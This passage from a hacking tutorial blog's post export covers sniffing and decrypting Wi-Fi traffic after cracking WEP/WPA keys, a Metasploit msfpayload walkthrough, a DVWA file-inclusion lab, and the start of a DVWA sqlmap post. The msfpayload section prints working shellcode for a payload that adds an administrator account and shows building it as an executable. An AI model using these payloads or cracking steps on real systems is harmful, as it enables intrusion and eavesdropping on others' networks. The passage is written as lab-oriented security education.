<li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;">Channel on which the Access Point working</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">To find out these things, we can run airodump on all the channels. This will list all available wireless networks with various pieces of information for each network.</span><img height="176px;" src="https://lh4.googleusercontent.com/GenEif75mzKyr9nGWpmCpDIXHlElZ88Fv86r_o3iuw3ALca3i0lkJ-6RXz6lT8Fev6WogeEnYuRaPyHpS5NxMS2hVZiemiQmcQp5dxVovTFt-KiJ_LutIuX2" width="697px;" /><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">We can start dumping the data from target network using airodump-ng utility from aircrack-ng suite.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">airodump-ng --bssid 90:F6:52:30:24:17 -w test_dump -c 1 mon0</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">This will start monitoring traffic on Access Point with BSSID = 90:F6:52:30:24:17 and channel =1 and the packets will be stored in a file named “test_dump”</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">After we have captured enough packets we can move on to extract data from the packets.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">But this task is not as easy as it sounds. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The packets that are flowing through the air are encrypted and they must be decrypted for making them readable by other programs. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">If we already know the passphrase for the network, we can decrypt the network traffic right away. In case we don’t know the password for the networks, we may have to take the following steps.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In case of WEP networks, the packets are simply encrypted using the passphrase as the key. We can easily find the key using aircrack-ng program if we have captured enough IVs and then move on to decrypt the packets.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">There are many tutorials on how to crack WEP key, like </span><a href="http://www.aircrack-ng.org/doku.php?id=simple_wep_crack" style="text-decoration: none;"><span style="color: #1155cc; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">this one</span></a><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In case of WPA/WPA2 networks, the key is never transmitted over the air. This makes it a little difficult to attack. The key to finding the passphrase of WPA/WPA2 network is in the 4-way handshake which happens when a new client is connected to the network. If we have captured the 4-way handshake, we are good to go and crack the passphrase using aircrack-ng utility. If you haven’t captured a handshake, </span><a href="http://www.aircrack-ng.org/doku.php?id=cracking_wpa" style="text-decoration: none;"><span style="color: #1155cc; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">learn how to do that</span></a><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Assuming we have found the passphrase, we can decrypt the network traffic captured earlier using utility called airdecap-ng.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">For WEP networks,</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">airdecap-ng -w <passphrase> test_dump-01.cap</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">For WPA/WPA2 networks,</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">airdecap-ng -p <passphrase> test_dump-01.cap</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">This will create a file with name test_dump-01-dec.cap which contains all the decrypted packets!</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Now we can use this file and extract juicy data from it using tools like </span><span style="font-family: Calibri; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">xplico, chaosreader, tcpxtract</span><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> etc.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Thats all for passively capturing data over a wireless network. We can do much more when we have all the packets in our hands. More on that later.</span></div>
</b>Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-4538251661335272060.post-6394983258564459972012-02-26T11:19:00.001+05:302014-01-07T09:10:02.391+05:30Collection of CTF writeups<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-e4otge-A6Q0/T0nBdOKuZfI/AAAAAAAAB50/iKsIKj6g4Lk/s1600/129014469823594441.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-e4otge-A6Q0/T0nBdOKuZfI/AAAAAAAAB50/iKsIKj6g4Lk/s400/129014469823594441.jpg" height="358" width="400" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Last month, I took part in a CTF competition of nullcon. It was great, it was fun, and it was my first CTF. I had practiced a little and was thinking "lets do this and win!!" But when I started playing, it became very clear that the practice you do in-house is far different that what is needed in the CTFs. I had no experience of playing a CTF whatsoever and that hurt. After the CTF ended, I started reading writeups of previous CTFs organised around the world in many conferences. It is really an enlightening read how creative you have to be at times to figure out how to solve a level. That is why I have collected writeups from various CTF winning teams. Who knows what trick might give you a WINning moment in the next CTF. I present here a few writeups from my collection. Do let me know if I have missed a good one through the comments. Hope you enjoy and learn from them! </span><br />
<ul style="text-align: left;">
<li><a href="http://0x1337.in/?p=114" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">Nullcon 2012 HackIM challenge</span></a></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ppp.cylab.cmu.edu/wordpress/?page_id=46" target="_blank">Plaid Parliment of Pwning</a> << Writeups by team 'ppp' from various competitions.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.defcon.org/html/links/dc-ctf.html" target="_blank">DEFCON Capture The Flag Archive</a></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.vnsecurity.net/2010/05/defcon-18-quals-writeups-collection/" target="_blank">DEFCON 18 Quals Writeup</a>s</span></li>
<li><a href="http://www.vnsecurity.net/c/capture-the-flag/" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">Writeups from VNSecurity</span></a></li>
<li><a href="http://www.plaidctf.com/pctf2011/writeups" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">Plaid CTF Writeup list 2011</span></a></li>
<li><a href="https://wiki.mozilla.org/Security/Events/CTF/WriteUp2012" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">Mozilla CTF2012 Writeups</span></a></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://leetmore.ctf.su/wp/category/writeups/" target="_blank">Writeups from team leetmore</a></span></li>
<li><a href="https://csawctf.poly.edu/writeups.php" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">CSAW 2011 </span></a></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ictf.cs.ucsb.edu/iCTF2011_We0wnYou_writeup.pdf" target="_blank">iCTF 2011 Winner writeup</a> [PDF]</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://rogunix.com/ctf/hacklu2011.html" target="_blank">Hack.lu 2011</a> </span></li>
</ul>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">UPDATE:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Guys over at <a href="http://ctftime.org/">CTFTime.org</a> are doing a great job collecting info about various CTFs around the world. You can read many more writeups <a href="https://ctftime.org/writeups" target="_blank">here</a></span></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4538251661335272060.post-10646982508905338432011-12-05T21:02:00.001+05:302011-12-05T22:55:02.530+05:30Metasploit's "other" utilities unleashed - I<div dir="ltr" style="text-align: left;" trbidi="on">
Metasploit is a huge tool. When I started learning and playing with it, all I knew was <span style="font-family: 'Courier New', Courier, monospace;">use,set,exploit and run</span>.<br />
That was awesome and I was happy with that. But then, I came to know that many Metasploit users don't even use the framework to its 50% capabilities. So I started exploring in the Metasploit directory and lo, so many utilities were sitting there begging me to use them! In this multi part series, I will introduce all these little gems that are packed in the Metasploit directory, ready to make your life a lot easier.<br />
<br />
<span style="background-color: #e06666;"><b><span style="font-family: Georgia, 'Times New Roman', serif;">msfpayload</span></b></span><br />
This is a command line utility in Metasploit, it is used for generating shellcode or a standalone payload which can be delivered to the victim for execution. Its real benefits are realized when developing new exploit modules and testing different types of shellcode with it.<br />
The syntax for msfpayload is very simple.<br />
<br />
Syntax:<br />
<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Usage: ./msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar></span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"><br /></span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">OPTIONS:</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"><br /></span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"> -h Help banner</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"> -l List available payloads</span><br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">msfpayload -l</span><br />
Lists all available payload as expected.<br />
<br />
<br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Framework Payloads (228 total)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">==============================</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><br /></span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Name Description</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> ---- -----------</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> aix/ppc/shell_find_port Spawn a shell on an established connection</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/exec Execute an arbitrary command</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/shell_find_port Spawn a shell on an established connection</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsdi/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsdi/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsdi/x86/shell_find_port Spawn a shell on an established connection</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> cmd/unix/generic Executes the supplied command</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> cmd/unix/interact Interacts with a shell on an established socket connection</span><br />
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">--snip--</span></div>
<div>
<br /></div>
<br />
After choosing payload, available variables for that payload can be listed out by using 'O' or 'S' argument.<br />
<br />
<br />
.<span style="font-family: 'Courier New', Courier, monospace;">/msfpayload windows/adduser S</span><br />
<div>
<div>
<span style="font-size: x-small;"> <span style="font-family: Georgia, 'Times New Roman', serif;">Name: Windows Execute net user /ADD</span></span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Module: payload/windows/adduser</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Version: 13053, 9179</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Platform: Windows</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Arch: x86</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Needs Admin: Yes</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Total size: 287</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Rank: Normal</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Provided by:</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> hdm <hdm@metasploit.com></span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> vlad902 <vlad902@gmail.com></span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> sf <stephen_fewer@harmonysecurity.com></span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Basic options:</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Name Current Setting Required Description</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">---- --------------- -------- -----------</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">EXITFUNC process yes Exit technique: seh, thread, process, none</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">PASS metasploit yes The password for this user</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">USER metasploit yes The username to create</span></div>
<div>
<br /></div>
<div>
Description:</div>
<div>
Create a new user and add them to local administration group</div>
</div>
<div>
<br /></div>
<br />
So, from the above information, we know that this payload requires 3 options to be set. We can change the values of these options if needed.<br />
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span><br />
<span style="font-family: 'Courier New', Courier, monospace;">./msfpayload windows/adduser PASS=betterhacker USER=betterhacker O</span><br />
<br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">--snip--</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><br /></span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Basic options:</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Name Current Setting Required Description</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">---- --------------- -------- -----------</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">EXITFUNC process yes Exit technique: seh, thread, process, none</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">PASS betterhacker yes The password for this user</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">USER betterhacker yes The username to create</span><br />
<br />
This way all available options for a payload can be modified. For example, if a payload requires you to provide RHOST IP address, you can mention it on the command line specifying its value.<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">./msfpayload windows/meterpreter/bind_tcp RHOST=192.168.1.2</span><br />
<div>
<br /></div>
<div>
The last part in the command syntax is the output format of this shellcode. Following types of outputs are supported: C, Perl, Ruby, Javascript, Exe, Dll, VBA, Raw</div>
<div>
<br /></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">./msfpayload windows/adduser C</span></div>
<div>
<span style="font-size: x-small;"><br /></span></div>
<div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">/*</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> * windows/adduser - 287 bytes</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> * http://www.metasploit.com</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> * VERBOSE=false, EXITFUNC=process, USER=metasploit, </span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> * PASS=metasploit</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> */</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">unsigned char buf[] = </span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x6d\x65\x74"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44\x44\x20\x26\x26"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x44\x00";</span></div>
</div>
<div>
<br />
Now this shellcode can be directly used in an exploit!<br />
<br /></div>
<div>
We can also create an executable from msfpayload.<br />
<span style="font-family: 'Courier New', Courier, monospace;">./msfpayload windows/adduser USER=betterhacker PASS=betterhacker X > adduser.exe</span><br />
<br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Created by msfpayload (http://www.metasploit.com).</span><br />
<br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Payload: windows/adduser</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Length: 293</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Options: {"USER"=>"betterhacker", "PASS"=>"betterhacker"}</span><br />
<div>
<br /></div>
</div>
<div>
This creates an exe file with name 'adduser.exe'<br />
It wont work as yet, because we haven't added executable rights to it. To do that:<br />
<span style="font-family: 'Courier New', Courier, monospace;">chmod +x adduser.exe </span><br />
<br />
Now, this little executable is ready to be executed and it works!</div>
That is it for <span style="font-family: Georgia, 'Times New Roman', serif;">msfpayload</span>. In the next part we will see <span style="font-family: Georgia, 'Times New Roman', serif;">msfencode </span>and <span style="font-family: Georgia, 'Times New Roman', serif;">msfvenom</span>. </div>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-4538251661335272060.post-60391928932342140242011-10-27T21:31:00.000+05:302011-10-27T21:31:24.403+05:30File Inclusion attack on DVWA<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
Hey, I am not going to write much about this vulnerability. Its pretty straight forward.<br />
The web developer has provided you the ability to include any file from the local system or even remote system. So you can be creative and include any file you want to own the system.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="382" src="http://www.youtube.com/embed/PReZd0MBOwk?rel=0&hd=1" width="600"></iframe>
<br />
After watching the video, try this URL just to get the perspective:<br />
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span><br />
<span style="font-family: 'Courier New', Courier, monospace;">http://localhost/dvwa/vulnerabilities/fi/?page=http://google.com/robots.txt</span><br />
<br />
Now, think as devilish as you can and see what else you can do with this hole ;)<br />
Also, take a look at this exploit already present in the Metasploit framework.<br />
<br />
<a href="http://www.metasploit.com/modules/exploit/unix/webapp/php_include">http://www.metasploit.com/modules/exploit/unix/webapp/php_include</a>
<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="382" src="http://www.youtube.com/embed/uIiDDlHfjkg?hd=1" width="600"></iframe>
<br />
<br /></div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-4538251661335272060.post-17045127123222891752011-10-19T23:14:00.000+05:302011-10-19T23:16:14.327+05:30Owning DVWA SQLi with sqlmap<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Here we go... finally writing this post on SQL injection on DVWA. I was caught up with some really boring office -day job- work and some other things to top that. But that has always
been
the case with my blogging. Its a sad story.<br />
<div>
</div>
<div>
<br /></div>
<div>
In this post I will explain the exploitation of SQL injection vulnerability present in DVWA. For details on DVWA and how to get it, please visit my previous <a href="http://www.betterhacker.com/2011/09/command-execution-on-dvwa.html">post</a>.</div>
<div>
<br /></div>
<div>
<a href="http://4.bp.blogspot.com/-JxFkmELykdA/Tp2wQMxRc9I/AAAAAAAAB2o/pzh4oXkcZnw/s1600/exploits_of_a_mom.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="195" src="http://4.bp.blogspot.com/-JxFkmELykdA/Tp2wQMxRc9I/AAAAAAAAB2o/pzh4oXkcZnw/s640/exploits_of_a_mom.png" width="640" /></a>
</div>
<div>
<br /></div>
<div style="text-align: left;">
SQLMAP:<br />
<span style="font-family: Times, 'Times New Roman', serif;">sqlmap is an automatic SQL injection and database takeover tool. <span style="background-color: white; color: #222222; line-height: 16px; text-align: -webkit-auto;">SQLMAP is capable of enumerating entire remote databases, and perform an active database fingerprinting.</span></span><br />
<span style="font-family: Times, 'Times New Roman', serif;"><span style="background-color: white; color: #222222; line-height: 16px; text-align: -webkit-auto;">Get sqlmap from : </span><a href="http://sqlmap.sourceforge.net/" style="background-color: transparent;">http://sqlmap.sourceforge.net/</a></span><br />
<br />
I am documenting steps that I carried out to pwn the DVWA. You are free to experiment with different options and parameters of sqlmap, it is a great tool.<br />
<br />
<br />
<span style="background-color: transparent;">Looking for SQL injection in the webapp:</span></div>
<div style="text-align: left;">
